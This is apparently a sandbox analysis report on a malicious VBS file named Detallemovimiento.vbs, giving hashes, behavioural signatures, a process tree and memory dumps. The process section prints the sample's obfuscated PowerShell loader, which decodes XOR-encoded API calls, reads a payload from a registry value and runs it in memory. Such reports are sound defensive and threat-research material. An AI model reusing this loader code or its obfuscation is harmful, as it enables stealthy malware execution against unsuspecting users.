Analysis
-
max time kernel: 160s
max time network: 177s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-11-2022 13:44
Static task: static1
Behavioral task: behavioral1
  Sample: Detallemovimiento.vbs
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: Detallemovimiento.vbs
  Resource: win10v2004-20221111-en
General
-
Target: Detallemovimiento.vbs
Size: 439KB
MD5: 1d50e209ab21cd2035f0727bdf51c6bb
SHA1: a9f206e9940d6f6b5abe7d608dfb15a20d5cf5f1
SHA256: a615a0e25040ca39c49560c9594c69f4ff6754faf0304c6e89c923cb340c9319
SHA512: 4d20bfd9c71956ccc87af37de1468445d5b1b87bab1eea6b7b9d0d6298d1b879e962d2615ff4e58fdc7eacbf2badc5277bc87930baee0ac02885dbcea3bb8ff9
SSDEEP: 6144:sDKtRixP0uu/1PM4Ramn3DBqVei8zWH30BiZSgP4K9LuTrEo7K08HIyGshUhBQxu:MK7iZ8PM4qVeHz0kBip4tQghmxxTs
Malware Config
Signatures
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (pid | process):
  916 | powershell.exe
  916 | powershell.exe
  4720 | powershell.exe
  4720 | powershell.exe
  1416 | powershell.exe
  1416 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 916 | powershell.exe
  Token: SeDebugPrivilege | 4720 | powershell.exe
  Token: SeDebugPrivilege | 1416 | powershell.exe
-
Suspicious use of WriteProcessMemory (8 IoCs)
Processes (description | pid | process | target process):
  PID 2988 wrote to memory of 916 | 2988 | WScript.exe | powershell.exe
  PID 2988 wrote to memory of 916 | 2988 | WScript.exe | powershell.exe
  PID 916 wrote to memory of 4720 | 916 | powershell.exe | powershell.exe
  PID 916 wrote to memory of 4720 | 916 | powershell.exe | powershell.exe
  PID 916 wrote to memory of 4720 | 916 | powershell.exe | powershell.exe
  PID 4720 wrote to memory of 1416 | 4720 | powershell.exe | powershell.exe
  PID 4720 wrote to memory of 1416 | 4720 | powershell.exe | powershell.exe
  PID 4720 wrote to memory of 1416 | 4720 | powershell.exe | powershell.exe
Processes
-
[1] C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Detallemovimiento.vbs"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line:
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pigs = """[obfuscated string omitted]""";;
      Function Tredvtedelene9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Bravaders = $Bravaders + $HS.Substring($i, 1); } $Bravaders;}
      $trresnors0 = Tredvtedelene9 'HiIElESeXTi ';
      $trresnors1= Tredvtedelene9 $Pigs;
      if([IntPtr]::size -eq 8){ start-job { param($a) powershell $a } -RunAs32 -Argument $trresnors1 | wait-job | Receive-Job;}else{ & ($trresnors0) $trresnors1;};;;"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[3] \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    Command line: "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line:
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 160); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}
      $Yndighedens0=HTB 'F3D9D3D4C5CD8EC4CCCC';
      $Yndighedens1=HTB 'EDC9C3D2CFD3CFC6D48EF7C9CE93928EF5CED3C1C6C5EEC1D4C9D6C5EDC5D4C8CFC4D3';
      $Yndighedens2=HTB 'E7C5D4F0D2CFC3E1C4C4D2C5D3D3';
      $Yndighedens3=HTB 'F3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C6';
      $Yndighedens4=HTB 'D3D4D2C9CEC7';
      $Yndighedens5=HTB 'E7C5D4EDCFC4D5CCC5E8C1CEC4CCC5';
      $Yndighedens6=HTB 'F2F4F3D0C5C3C9C1CCEEC1CDC58C80E8C9C4C5E2D9F3C9C78C80F0D5C2CCC9C3';
      $Yndighedens7=HTB 'F2D5CED4C9CDC58C80EDC1CEC1C7C5C4';
      $Yndighedens8=HTB 'F2C5C6CCC5C3D4C5C4E4C5CCC5C7C1D4C5';
      $Yndighedens9=HTB 'E9CEEDC5CDCFD2D9EDCFC4D5CCC5';
      $Nbedes0=HTB 'EDD9E4C5CCC5C7C1D4C5F4D9D0C5';
      $Nbedes1=HTB 'E3CCC1D3D38C80F0D5C2CCC9C38C80F3C5C1CCC5C48C80E1CED3C9E3CCC1D3D38C80E1D5D4CFE3CCC1D3D3';
      $Nbedes2=HTB 'E9CED6CFCBC5';
      $Nbedes3=HTB 'F0D5C2CCC9C38C80E8C9C4C5E2D9F3C9C78C80EEC5D7F3CCCFD48C80F6C9D2D4D5C1CC';
      $Nbedes4=HTB 'F6C9D2D4D5C1CCE1CCCCCFC3';
      $Nbedes5=HTB 'CED4C4CCCC';
      $Nbedes6=HTB 'EED4F0D2CFD4C5C3D4F6C9D2D4D5C1CCEDC5CDCFD2D9';
      $Nbedes7=HTB 'E9E5F8';
      $Nbedes8=HTB 'FC';
      Set-Alias -name Nbedes9 -value $Nbedes7;
      function fkp {Param ($v_m, $v_p) ;$Uncommonness0 =HTB '84D6D5CECD809D8088FBE1D0D0E4CFCDC1C9CEFD9A9AE3D5D2D2C5CED4E4CFCDC1C9CE8EE7C5D4E1D3D3C5CDC2CCC9C5D3888980DC80F7C8C5D2C58DEFC2CAC5C3D480DB8084FF8EE7CCCFC2C1CCE1D3D3C5CDC2CCD9E3C1C3C8C5808DE1CEC48084FF8EECCFC3C1D4C9CFCE8EF3D0CCC9D48884EEC2C5C4C5D39889FB8D91FD8EE5D1D5C1CCD38884F9CEC4C9C7C8C5C4C5CED3908980DD898EE7C5D4F4D9D0C58884F9CEC4C9C7C8C5C4C5CED39189';Nbedes9 $Uncommonness0;
      $Uncommonness5 = HTB '84D6C1D2FFC7D0C1809D8084D6D5CECD8EE7C5D4EDC5D4C8CFC48884F9CEC4C9C7C8C5C4C5CED3928C80FBF4D9D0C5FBFDFD80E08884F9CEC4C9C7C8C5C4C5CED3938C8084F9CEC4C9C7C8C5C4C5CED3948989';Nbedes9 $Uncommonness5;
      $Uncommonness1 = HTB 'D2C5D4D5D2CE8084D6C1D2FFC7D0C18EE9CED6CFCBC58884CED5CCCC8C80E088FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C6FD88EEC5D78DEFC2CAC5C3D480F3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C68888EEC5D78DEFC2CAC5C3D480E9CED4F0D4D2898C808884D6D5CECD8EE7C5D4EDC5D4C8CFC48884F9CEC4C9C7C8C5C4C5CED39589898EE9CED6CFCBC58884CED5CCCC8C80E08884D6FFCD898989898C8084D6FFD08989';Nbedes9 $Uncommonness1;}
      function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Uncommonness2 = HTB '[hex string missing from source]';Nbedes9 $Uncommonness2;
      $Uncommonness3 = HTB '84F6F4E28EE4C5C6C9CEC5E3CFCED3D4D2D5C3D4CFD28884F9CEC4C9C7C8C5C4C5CED3968C80FBF3D9D3D4C5CD8EF2C5C6CCC5C3D4C9CFCE8EE3C1CCCCC9CEC7E3CFCED6C5CED4C9CFCED3FD9A9AF3D4C1CEC4C1D2C48C8084D6C1D2FFD0C1D2C1CDC5D4C5D2D3898EF3C5D4E9CDD0CCC5CDC5CED4C1D4C9CFCEE6CCC1C7D38884F9CEC4C9C7C8C5C4C5CED39789';Nbedes9 $Uncommonness3;
      $Uncommonness4 = HTB '84F6F4E28EE4C5C6C9CEC5EDC5D4C8CFC48884EEC2C5C4C5D3928C8084EEC2C5C4C5D3938C8084D6D2D48C8084D6C1D2FFD0C1D2C1CDC5D4C5D2D3898EF3C5D4E9CDD0CCC5CDC5CED4C1D4C9CFCEE6CCC1C7D38884F9CEC4C9C7C8C5C4C5CED39789';Nbedes9 $Uncommonness4;
      $Uncommonness5 = HTB 'D2C5D4D5D2CE8084F6F4E28EE3D2C5C1D4C5F4D9D0C58889';Nbedes9 $Uncommonness5 ;}
      $kk = HTB 'CBC5D2CEC5CC9392';
      $Uncommonness6 = HTB '84D6C1D2FFD6C1809D80FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE7C5D4E4C5CCC5C7C1D4C5E6CFD2E6D5CEC3D4C9CFCEF0CFC9CED4C5D28888C6CBD08084CBCB8084EEC2C5C4C5D394898C8088E7E4F480E088FBE9CED4F0D4D2FD8C80FBF5E9CED49392FD8C80FBF5E9CED49392FD8C80FBF5E9CED49392FD898088FBE9CED4F0D4D2FD898989';Nbedes9 $Uncommonness6;
      $var_nt = fkp $Nbedes5 $Nbedes6;
      $Uncommonness7 = HTB '84F3D4C1D4CFC9CC93809D8084D6C1D2FFD6C18EE9CED6CFCBC588FBE9CED4F0D4D2FD9A9AFAC5D2CF8C809396928C8090D8939090908C8090D8949089';Nbedes9 $Uncommonness7;
      $Uncommonness8 = HTB '84CFD2C9809D8084D6C1D2FFD6C18EE9CED6CFCBC588FBE9CED4F0D4D2FD9A9AFAC5D2CF8C8090D89190909090908C8090D8939090908C8090D89489';Nbedes9 $Uncommonness8;
      $Tredvtedelene=(Get-ItemProperty -Path 'HKCU:\tommelfingerreglen\Nicotinized').Pollux;
      $Uncommonness9 = HTB '84F5CEC3CFCDCDCFCECEC5D3D3809D80FBF3D9D3D4C5CD8EE3CFCED6C5D2D4FD9A9AE6D2CFCDE2C1D3C59694F3D4D2C9CEC78884F4D2C5C4D6D4C5C4C5CCC5CEC589';Nbedes9 $Uncommonness9;
      $Tredvtedelene0 = HTB 'FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE3CFD0D98884F5CEC3CFCDCDCFCECEC5D3D38C80908C808084F3D4C1D4CFC9CC938C8093969289';Nbedes9 $Tredvtedelene0;
      $size=$Uncommonness.count-362;
      $Tredvtedelene1 = HTB 'FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE3CFD0D98884F5CEC3CFCDCDCFCECEC5D3D38C809396928C8084CFD2C98C8084D3C9DAC589';Nbedes9 $Tredvtedelene1;
      $Tredvtedelene2 = HTB '84D6C1D2FFD2D5CECDC5809D80FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE7C5D4E4C5CCC5C7C1D4C5E6CFD2E6D5CEC3D4C9CFCEF0CFC9CED4C5D28884F3D4C1D4CFC9CC938C8088E7E4F480E088FBE9CED4F0D4D2FD8CFBE9CED4F0D4D2FD898088FBF6CFC9C4FD898989';Nbedes9 $Tredvtedelene2;
      $Tredvtedelene3 = HTB '84D6C1D2FFD2D5CECDC58EE9CED6CFCBC58884CFD2C98C84D6C1D2FFCED489';Nbedes9 $Tredvtedelene3#"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize: 53KB
MD5: 93678e82d776686aa54c42b8a98e6cbc
SHA1: 802939dfed99ac74814c4371388b204c5810241d
SHA256: da32a79a8e04cbafb1c5980b3d6225f4705010df5eb45d464cd5bf6b642d7841
SHA512: 0b412a1e11c0639d72f6a58c661ecc43da021c010c4d1e66051c5a376ebab287480bbf663345c9bd2a79ec3a35a9788cf04d74d612449f76fe2c87576cd13520
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize: 55KB
MD5: e88ba838ebe9eb37911d2853477d7d12
SHA1: 549e6e9086fb77fe2846a656d6efaaa4df7910f2
SHA256: 5ccd5470be744dcf89df041557247fb358c835150d74fd6e1114d22189b845cc
SHA512: b3af68b0d253b4a733d6bec8a5685000752c8adf3fdc3209f9c9a15ecd965d35749b0e0091b5ae1b77b07d650703bc7a9478bb829d5c3bf88055e2e2c3e4d16f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize: 55KB
MD5: b40072f437946ad68d49c87939bb0ba8
SHA1: 06a414bac8873528add8e27abfdb473c1cac1988
SHA256: b6077542ca11f6aa897dab1bc46b53758506ecd679cf3c74648126f6f3f9ef31
SHA512: 95ac5f6818396a15b486690821499e16f84f991070240e04670970837123172161f2784fd6cd154694b84de48a741823e7131ef565a717f60e89f4deb08d8f37
-
memory/916-135-0x00007FF9CD470000-0x00007FF9CDF31000-memory.dmp (Filesize: 10.8MB)
-
memory/916-136-0x000001306E640000-0x000001306E7B6000-memory.dmp (Filesize: 1.5MB)
-
memory/916-137-0x000001306E9D0000-0x000001306EBDA000-memory.dmp (Filesize: 2.0MB)
-
memory/916-132-0x0000000000000000-mapping.dmp
-
memory/916-134-0x00007FF9CD470000-0x00007FF9CDF31000-memory.dmp (Filesize: 10.8MB)
-
memory/916-133-0x000001306D890000-0x000001306D8B2000-memory.dmp (Filesize: 136KB)
-
memory/1416-149-0x0000000007C10000-0x0000000007CA6000-memory.dmp (Filesize: 600KB)
-
memory/1416-155-0x0000000007B10000-0x000000000818A000-memory.dmp (Filesize: 6.5MB)
-
memory/1416-153-0x0000000007B10000-0x000000000818A000-memory.dmp (Filesize: 6.5MB)
-
memory/1416-151-0x0000000008DC0000-0x0000000009364000-memory.dmp (Filesize: 5.6MB)
-
memory/1416-150-0x0000000007A40000-0x0000000007A62000-memory.dmp (Filesize: 136KB)
-
memory/1416-145-0x0000000000000000-mapping.dmp
-
memory/4720-138-0x0000000000000000-mapping.dmp
-
memory/4720-148-0x0000000001060000-0x000000000107A000-memory.dmp (Filesize: 104KB)
-
memory/4720-147-0x0000000007740000-0x0000000007DBA000-memory.dmp (Filesize: 6.5MB)
-
memory/4720-144-0x0000000006770000-0x000000000678E000-memory.dmp (Filesize: 120KB)
-
memory/4720-143-0x0000000005F70000-0x0000000005FD6000-memory.dmp (Filesize: 408KB)
-
memory/4720-142-0x0000000005F00000-0x0000000005F66000-memory.dmp (Filesize: 408KB)
-
memory/4720-141-0x0000000005810000-0x0000000005832000-memory.dmp (Filesize: 136KB)
-
memory/4720-140-0x00000000058D0000-0x0000000005EF8000-memory.dmp (Filesize: 6.2MB)
-
memory/4720-139-0x0000000003020000-0x0000000003056000-memory.dmp (Filesize: 216KB)